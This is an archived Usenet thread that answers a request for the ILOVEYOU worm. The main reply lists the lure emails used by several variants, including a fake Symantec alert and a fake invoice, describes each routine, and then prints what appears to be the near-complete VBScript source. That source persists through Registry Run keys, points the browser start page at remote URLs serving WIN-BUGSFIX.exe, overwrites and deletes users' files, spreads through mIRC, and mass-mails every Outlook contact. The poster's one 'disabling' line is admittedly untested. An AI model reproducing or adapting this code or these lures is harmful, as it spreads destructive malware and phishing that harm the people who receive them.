Anyone has the code for the I Love You virus?
Yair Kuszpet
Peter
2) My Description
3) The Source Code!
Compiled by...
Peter
1) --The Variations --------------------------------------------
VARIANT: LoveLetter.B
This variant uses another message subject when spreads:
Subject: Susitikim shi vakara kavos puodukui...
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
The subject field is Lithuanian and means "Let's meet this evening for a cup
of coffee..."
LoveLetter.B contains the following comments in its code:
Modified Lameris Tamoshius / Lithuania (Tovi systems)
VARIANT: LoveLetter.C
This variant propagates in a message with
Subject: fwd: Joke
Attachment: Very Funny.vbs
VARIANT: LoveLetter.D
This variant is a slightly modified variant from VBS/LoveLetter.A.
VARIANT: LoveLetter.E
VBS/LoveLetter.E spreads itself in a message that is as follows:
Subject: Mothers Day Order Confirmation
Body: We have proceeded to charge your credit card for the
amount of $326.92 for the mothers day diamond special.
We have attached a detailed invoice to this email.
Please print out the attachment and keep it in a safe
place.Thanks Again and Have a Happy Mothers Day!
mothe...@subdimension.com
Attachment: mothersday.vbs
Additionally, this variant deletes all files with the extension ".ini" and
".bat" instead of ".jpg" and ".jpeg".
This variant does not attempt to download the "WIN-BUGSFIX.exe" from the
Internet, however it modifies the Internet Explorer start page.
VARIANT: LoveLetter.F
This variant spreads in email with the following content:
Subject: Dangerous Virus Warning
Body: There is a dangerous virus circulating. Please click
attached picture to view it and learn to avoid it.
Attachment: virus_warning.jpg.vbs
VARIANT: LoveLetter.G
VBS/LoveLetter.G is similar to the original VBS/LoveLetter.A.
This variant sends a message, that seems to originate from Symantec's
support. This is not true. The message looks like the following:
Subject: Virus ALERT!!!
From: sup...@symantec.com
Body: Dear Symantec customer,
Symantec's AntiVirus Research Center began receiving
reports regarding VBS.LoveLetter.A virus early morning on
May 4, 2000 GMT.
This worm appears to originate from the Asia Pacific
region. Distribution of the virus is widespread and
hundreds of thousands of machines are reported infected.
The VBS.LoveLetter.A is an Internet worm that uses
Microsoft Outlook to e-mail itself as an attachment.
The subject line of the e-mail reads ILOVEYOU, with the
attachment titled LOVE-LETTER-FOR-YOU.TXT.VBS. Once the
attachment is opened, the virus replicates and sends an
e-mail to all e-mail addresses listed in the address book.
The virus also spreads itself via Internet relay chat and
infects files on local and remote drives including files
with extensions vbs, vbe, js, sje, css, wsh, sct, hta, jpg,
jpeg, mp3, mp2.
Users should exercise caution when opening e-mails with
this subject line, even if the e-mail is from someone they
know, as that is how the virus is spread.
Symantec Corp. today announced availability of the virus
definition to detect, repair and protect users against the
VBS.LoveLetter.A virus.
This definition is available now via Symantec's LiveUpdate
and can also be downloaded from the following web sites:
http://www.symantecstore.com/AF74211/promo/loveletter
http://www.digitalriver.com/symantec
Also as a quick solution Symantec Corp. offers Visual Basic
Script to protect your PC against this worm. (See
attached.)
Note! When executed, this script will protect Your PC from
being INFECTED by VBS.LoveLetter.A virus.
To cure already infected PC's download Norton Antivirus
Updates mentioned above.
Symantec Corporation - a world leader in internet security
technology.
Attachment: protect.vbs
This variant changes the Internet Explorer start page pointing to an adult
site. The default search page is set to point to a hacker site.
For the files with the following extensions: ".js", ".jse", ".css", ".wsh",
".sct", ".hta", ".com" and ".bat", the virus will create a new file with the
same name, but using the extension ".vbs". The original file will be
deleted. Since all ".com" files are removed, the system cannot be restarted
any longer.
This variant does not attempt to download the "WIN-BUGSFIX.exe".
VARIANT: LoveLetter.H
VBS/LoveLetter.H is a slightly modified variant of VBS/LoveLetter.A.
VARIANT: LoveLetter.I
This variant spreads in emails with the following content:
Subject: Important ! Read carefully !!
Body: Check the attached IMPORTANT coming from me !
Attachment: IMPORTANT.TXT.vbs
VARIANT: LoveLetter.J
VBS/LoveLetter.J is a slightly modified variant of VBS/LoveLetter.G.
VARIANT: LoveLetter.K
This variant is functionally identical with VBS/LoveLetter.A. However, the
email message and the attachment name has been modified.
VBS/LoveLetter.K sends messages with the following content:
Subject: How to protect yourself from the IL0VEY0U bug!
Body: Here's the easy way to fix the love virus.
Attachment: Virus-Protection-Instructions.vbs
2) ---My Description-------------------------------------------
It has several sub's (in order in the file not in order whe run)....
Sub 1: regruns()
1) Declare variables
2) Stop it timing out
3) Copy itself into the windows folder as MSKernel32.vbs, Win32DLL.vbs &
LOVE-LETTER-FOR-YOU.TXT.vbs
4) Set it to run those files every time the computer starts up
5) Set the Startup page for Internet Explorer to a webserver that has
WIN-BUGSFIX.exe on it.
5) Downloads a file called WIN-BUGSFIX.exe
6) Copies this file to the windows folder & sets it to run at startup
Sub 2: listadriv()
1) Declare Variables
2) Get the next dirve letter
3) Return the drive letter to continue
Sub 3: infectfiles()
1) Declare Variables
2) Search for all .vbs, .vbe or .js, .jse, .css or .jpg, .jpeg or .mp3,
.mp2
3) When found one, it puts it's self, eather inplace or add's itself to
that file and continues the search
4) If it finds the IRC Application called 'mirc32.exe', it writes the
following into the 'script.ini':
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick ((the dir path here)) \LOVE-LETTER-FOR-YOU.HTM
n3=}
Sub 4: folderlist()
1) Declare Variables
2) Get's all folders in a specified path & starts the sub to infect them
Sub 5: regcreate()
1) Declare Variables
2) Write to a registry Key
Sub 7: regget()
1) Declare Variables
2) Read a registry Key
Sub 8: fileexist()
1) Declare Variables
2) Check if file exzists
3) Return if file exzists
Sub 9: spreadtoemail() <-- THE 'WORM' PART
1) Declare Variables
2) Load the "Outlook.Application"
3) Go through each name in address list...
4) Create a message with... Subject as: ILOVEYOU, Message as: "kindly check
the attached LOVELETTER coming from me." & Adds an attachment from the
windows folder - LOVE-LETTER-FOR-YOU.TXT.vbs
5) Adds that to the registry to send it.
Sub 10: html() <-- THE 'WORM' PART
1) Declare Variables
2) This is just a long string of the HTML code "<HTML><HEAD><TITLE>LOV"...
and so on
3) Creates LOVE-LETTER-FOR-YOU.HTM in the windows folder
2) ---The Source Code! -------------------------------------------
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / isp...@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
END REM <-- TIHS LINE DISABLES THE VIRUS RUNNING. (Added by me but not
tested!)
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? isp...@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-...@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-...@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Larry Linson
Yair Kuszpet <yai...@netvision.net.il> wrote:
> Or can anyone explain what it actually does?
As it is said to be executable vbscript code included in the e-mail, it
would appear that several millions of people have the code... anyone
who's received it in any of its various mutations.
--
L. M. (Larry) Linson
Access example databases at http://homestead.deja.com/user.accdevel
New: Book reviews, previously published in North Texas PC News
Script execution must be enabled and Windows set to Small Fonts
Sent via Deja.com http://www.deja.com/
Before you buy.